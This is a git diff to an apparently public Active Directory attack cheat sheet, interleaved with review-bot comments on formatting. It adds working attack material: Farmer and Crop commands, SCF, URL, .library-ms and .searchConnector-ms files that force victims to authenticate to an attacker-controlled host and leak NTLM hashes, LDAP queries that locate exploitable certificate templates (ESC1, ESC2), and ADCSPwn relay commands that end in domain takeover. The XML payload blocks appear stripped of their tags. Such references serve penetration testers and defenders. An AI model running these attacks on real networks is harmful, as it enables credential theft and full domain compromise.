diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 2b9811e..b3e3f24 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -16,6 +16,10 @@ - [PrintNightmare](#printnightmare) - [Open Shares](#open-shares) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) + - [SCF Files](#scf-files) + - [URL Files](#url-files) + - [Windows Library Files](#windows-library-files) + - [Windows Search Connectors Files](#windows-search-connectors-files) - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo) - [Find vulnerable GPO](#find-vulnerable-gpo) @@ -65,6 +69,7 @@ - [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [Active Directory Certificate Services](#active-directory-certificate-services) - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) + - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) 
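Review bot: the new entry `ESC2 - Misconfigured Certificate Templates` reuses ESC1's title word for word, so the table of contents no longer tells the two sections apart; since the ESC2 body added in the `@@ -1827` hunk distinguishes it by the Any Purpose EKU (2.5.29.37.0), a title such as `ESC2 - Any Purpose EKU` would make both the entry and its anchor self-describing. The four new sub-entries are fine, but the parent title `SCF and URL file attack against writeable share` now undersells the section, which also covers `.library-ms` and `.searchConnector-ms` files; consider renaming it (anchor and TOC entry together) to cover all four file types.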
@@ -709,6 +714,22 @@ Requirements: ### SCF and URL file attack against writeable share +Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) + +```ps1 +# Farmer to receive auth +farmer.exe [seconds] [output] +farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely +farmer.exe 8888 60 # one minute + +# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks +crop.exe [options] +Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico +Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec +``` + +#### SCF Files + Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` ```powershell @@ -719,6 +740,8 @@ IconFile=\\10.10.10.10\Share\test.ico Command=ToggleDesktop ``` +#### URL Files + This attack also works with `.url` files and `responder -I eth0 -v`. ```powershell @@ -729,6 +752,53 @@ IconFile=\\10.10.10.10\%USERNAME%.icon IconIndex=1 ``` +#### Windows Library Files + +> Windows Library Files (.library-ms) + +```xml + + + @windows.storage.dll,-34582 + 6 + true + imageres.dll,-1003 + + {7d49d726-3c21-4f05-99aa-fdc2c9474656} + + + + true + false + + \\\\workstation@8888\\folder + + + + +``` + +#### Windows Search Connectors Files + +> Windows Search Connectors (.searchConnector-ms) + +```xml + + + imageres.dll,-1002 + Microsoft Outlook + false + true + \\\\workstation@8888\\folder.ico + + {91475FE5-586B-4EBA-8D75-D17434B8CDF6} + + + \\\\workstation@8888\\folder + + +``` + ### Passwords in SYSVOL & Group Policy Preferences 
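Review bot: the usage line `farmer.exe [seconds] [output]` drops the first positional argument, while both examples pass a port first (`farmer.exe 8888 0 c:\windows\temp\test.tmp`, `farmer.exe 8888 60`); it should read `farmer.exe [port] [seconds] [output]`. Two typos in the same block: "Theses attacks" and "undefinitely". UNC paths are escaped inconsistently inside fenced code: the Crop and XML examples double every backslash (`\\\\fileserver\\common`, `\\\\workstation@8888\\folder`) while the existing SCF example writes `IconFile=\\10.10.10.10\Share\test.ico`; fenced blocks need no escaping, so the doubled form renders literally and will not work when copied. Also, the two XML blocks as shown contain only element values (`@windows.storage.dll,-34582`, `6`, `true`, the GUIDs) with no element tags, so they are not complete `.library-ms` / `.searchConnector-ms` documents; verify the tags survived, and turn the bare `> Windows Library Files (.library-ms)` and `> Windows Search Connectors (.searchConnector-ms)` lines into a sentence or heading, since as `>` blockquotes they read as quoted text.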
@@ -1808,6 +1878,8 @@ Exploitation: * Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates ```ps1 Certify.exe find /vulnerable + or + PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' ``` * Use Certify to request a Certificate and add an alternative name (user to impersonate) ```ps1 @@ -1827,6 +1899,19 @@ Exploitation: **NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints. +#### ESC2 - Misconfigured Certificate Templates + +Requirements: +* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0) + +Exploitation: +* Find template + ```ps1 + PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local' + ``` +* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). + + #### ESC8 - AD CS Relay Attack > An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. 
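Review bot: inside the ```ps1 fence the bare line `or` and the `PS>` prompt prefix are not PowerShell, so the block cannot be pasted as-is; make the separator a comment (`# or`) and drop the prompt to match the first line `Certify.exe find /vulnerable`. The ESC1 LDAP filter also has a stray space between `(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)` and `(pkiextendedkeyusage=1.3.6.1.5.2.3.4)`, which strict LDAP filter parsers reject; remove it. In the new ESC2 section the requirement text and the query disagree: the text says the template must let the requester supply a SAN, but the filter has no `mspki-certificate-name-flag` clause (the ESC1 filter above does: `(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)`), and its `(!(pkiextendedkeyusage=*))` branch also matches templates with no EKU at all, which the text does not mention; align the two, and use one placeholder domain in `-SearchBase` instead of `DC=lab,DC=local` in one query and `DC=megacorp,DC=local` in the other. The double blank line before `#### ESC8` can be reduced to one.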
@@ -1869,7 +1954,26 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # Mimikatz mimikatz> lsadump::dcsync /user:krbtgt ``` +* Version 3: ADCSPwn + ```powershell + https://github.com/bats3c/ADCSPwn + adcspwn.exe --adcs --port [local port] --remote [computer] + adcspwn.exe --adcs cs.pwnlab.local + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local + # ADCSPwn arguments + adcs - This is the address of the AD CS server which authentication will be relayed to. + secure - Use HTTPS with the certificate service. + port - The port ADCSPwn will listen on. + remote - Remote machine to trigger authentication from. + username - Username for non-domain context. + password - Password for non-domain context. + dc - Domain controller to query for Certificate Templates (LDAP). + unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . + output - Output path to store base64 generated crt. + ``` ### Dangerous Built-in Groups Usage 
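Review bot: the ```powershell block mixes runnable commands with a bare URL (`https://github.com/bats3c/ADCSPwn`) and nine uncommented argument descriptions (`adcs - This is the address of the AD CS server ...`), none of which is valid PowerShell; move the URL into the bullet text and prefix each description line with `#` (only the `# ADCSPwn arguments` header is). The usage line `adcspwn.exe --adcs --port [local port] --remote [computer]` is missing the value placeholder after `--adcs`. For consistency with the `[local port]` / `[computer]` placeholders, the sample credentials `pwnlab.local\mranderson` / `The0nly0ne!` would be clearer as `[domain\user]` / `[password]`. Minor: `(Petitpotam) .` has a stray space before the period.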
@@ -2914,4 +3018,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) * [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) * [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) -* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) \ No newline at end of file +* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) +* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/)
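Review bot: the new reference uses a different format from the rest of the list, `... in 4 steps by frank | Jul 23, 2021`, versus the `Title - Author - Date` pattern of the surrounding entries (e.g. `NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema`); restate it as `AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps - frank - Jul 23, 2021`. Good that the change also restores the trailing newline the previous revision lacked (`\ No newline at end of file`).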